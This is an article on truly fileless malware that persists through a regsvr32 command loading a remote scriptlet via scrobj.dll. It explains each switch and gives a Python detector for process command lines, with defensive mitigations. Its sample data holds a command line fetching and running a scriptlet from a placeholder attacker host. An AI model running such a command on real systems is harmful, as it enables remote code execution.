Fileless malware is becoming more common in criminal ("blackhat") operations. What was first seen in a few sophisticated targeted attacks is now becoming standard practice, partly because the Vault 7 leak revealed the CIA's modus operandi.
There seems to be confusion about the definition of fileless malware, so news sites will often call malware fileless when it definitely is not. Typically they are describing a conventional backdoor that sits on disk on the compromised machine and downloads an encrypted payload that is only ever decrypted in memory.
In this article we will look at truly fileless malware that needs no file on disk to survive a reboot. The sample I chose was first analyzed by TrendMicro. The team behind the campaign put a lot of effort into staying under the radar of both anti-virus products and analysts.
The initial compromise method is unknown because the malware erases all system logs. I suspect that it used some remote code execution vulnerability to create the following registry key, whose value is a regsvr32 command line built from the options explained below:
Regsvr32 is the Windows command-line utility for registering and unregistering (/u) DLLs. It accepts both / and - as the switch character; the options used here are:
/s = silent; no message boxes, so the user sees nothing
/n = do not call DllRegisterServer (only meaningful together with /i)
/u = unregister; combined with /i this calls DllInstall with the uninstall flag instead of DllRegisterServer
/i = pass an optional parameter (here a URL) to DllInstall
scrobj.dll = Microsoft's Script Component Runtime, present on every Windows system; its DllInstall treats the parameter as the location of a scriptlet (.sct) file, loads it and runs the script inside it, so the payload is pulled from the network on every boot instead of being stored on disk
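The option semantics above are exactly what a detection needs: a legitimate regsvr32 run registers a DLL that already lives on disk, while this technique points /i: at a remote scriptlet and names scrobj.dll as the "DLL". The following detector is an added example written for this article; it is not code from the original post, from TrendMicro, or from the malware. It parses regsvr32 command lines the way they appear in process-creation telemetry (for instance the CommandLine field of Sysmon Event ID 1 or Security event 4688), and the sample records, including the hostnames and paths in them, are constructed placeholders, not real observations.

```python
"""Flag regsvr32 + scrobj.dll scriptlet abuse in process command lines.

Added example: parses regsvr32 options (/s /n /u /i:<arg> <dll>) and flags
invocations whose /i: argument is handed to scrobj.dll, i.e. the fileless
persistence technique described above. Not code from the original article.
"""
import ntpath
import shlex
from urllib.parse import urlparse

# Constructed sample records (record id, command line); not real telemetry.
# Hostnames and paths are placeholders.
SAMPLE_COMMAND_LINES = [
    ("1", r'"C:\Windows\System32\regsvr32.exe" /s /n /u /i:http://attacker.example/payload.sct scrobj.dll'),
    ("2", r'regsvr32.exe /s "C:\Program Files\Vendor\component.dll"'),
    ("3", r"regsvr32 -s -n -i:C:\Users\Public\x.sct scrobj.dll"),
    ("4", r"C:\Windows\SysWOW64\regsvr32.exe /u /s mycontrol.ocx"),
    ("5", r'"C:\Program Files\App\app.exe" /i:http://cdn.example/update.sct'),
]

# URL schemes that mean the scriptlet is fetched over the network.
REMOTE_SCHEMES = {"http", "https", "ftp"}


def _tokens(cmdline):
    """Split a Windows command line on whitespace, honouring double quotes.

    posix=False keeps backslashes literal (C:\\Windows stays intact); the
    surrounding quotes are then stripped from each token.
    """
    return [tok.strip('"') for tok in shlex.split(cmdline, posix=False)]


def parse_regsvr32(cmdline):
    """Return (flags, install_arg, targets) or None if not a regsvr32 run.

    flags       - set of lower-cased switch names, e.g. {"s", "n", "u", "i"}
    install_arg - the value passed as /i:<arg>, or None
    targets     - positional arguments, normally the DLL(s) being registered
    """
    toks = _tokens(cmdline)
    if not toks:
        return None
    if ntpath.basename(toks[0]).lower() not in ("regsvr32.exe", "regsvr32"):
        return None
    flags, install_arg, targets = set(), None, []
    for tok in toks[1:]:
        # regsvr32 accepts both "/" and "-" as the switch character.
        if len(tok) > 1 and tok[0] in "/-":
            name, sep, value = tok[1:].partition(":")
            name = name.lower()
            flags.add(name)
            if name == "i" and sep:
                install_arg = value
        else:
            targets.append(tok)
    return flags, install_arg, targets


def classify(cmdline):
    """Return "high", "medium" or None for one command line.

    With /n /u /i regsvr32 never calls DllRegisterServer; it calls DllInstall
    with the /i: argument, and scrobj.dll treats that argument as the location
    of a scriptlet to execute. A normal DLL registration never names scrobj.dll
    as its target, so any /i + scrobj.dll combination is abnormal; a remote URL
    in the argument is the fileless variant and rated highest.
    """
    parsed = parse_regsvr32(cmdline)
    if parsed is None:
        return None
    flags, install_arg, targets = parsed
    uses_scrobj = any(ntpath.basename(t).lower() == "scrobj.dll" for t in targets)
    if "i" not in flags or not uses_scrobj:
        return None  # ordinary (un)registration of a DLL on disk
    scheme = urlparse(install_arg or "").scheme.lower()
    if scheme in REMOTE_SCHEMES:
        return "high"    # scriptlet pulled from the network, nothing on disk
    return "medium"      # local scriptlet through scrobj.dll, still abnormal


def scan(records):
    """Run classify() over (id, command line) pairs; return flagged ids."""
    findings = []
    for rec_id, cmdline in records:
        severity = classify(cmdline)
        if severity:
            findings.append((rec_id, severity))
    return findings


if __name__ == "__main__":
    for rec_id, severity in scan(SAMPLE_COMMAND_LINES):
        print(f"record {rec_id}: {severity}")
```

Only records 1 and 3 are flagged: record 1 (remote .sct via scrobj.dll) as high, record 3 (local scriptlet via scrobj.dll) as medium. Records 2 and 4 are ordinary registrations, and record 5 is not regsvr32 at all even though it carries a /i:http argument. The parser is order-independent and case-insensitive, since the option order and case are entirely up to the attacker; what it cannot see is a scriptlet fetched by some other signed binary, so pair it with a rule on regsvr32.exe making outbound network connections.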
Fileless malware often abuses Windows built-in functionality such as PowerShell, and most people who get compromised never use those components themselves. No matter what operating system you use, disable or restrict the services and tools you do not need. The caveat for this sample is that regsvr32 and scrobj.dll are signed parts of Windows itself and cannot simply be removed, so anti-virus will not flag them on their own; detection has to rely on the command line (a URL in the /i: argument, scrobj.dll as the target) and on regsvr32.exe making outbound network connections, neither of which a legitimate DLL registration does. Application control (AppLocker or Windows Defender Application Control) can block regsvr32 outright for users who have no reason to run it.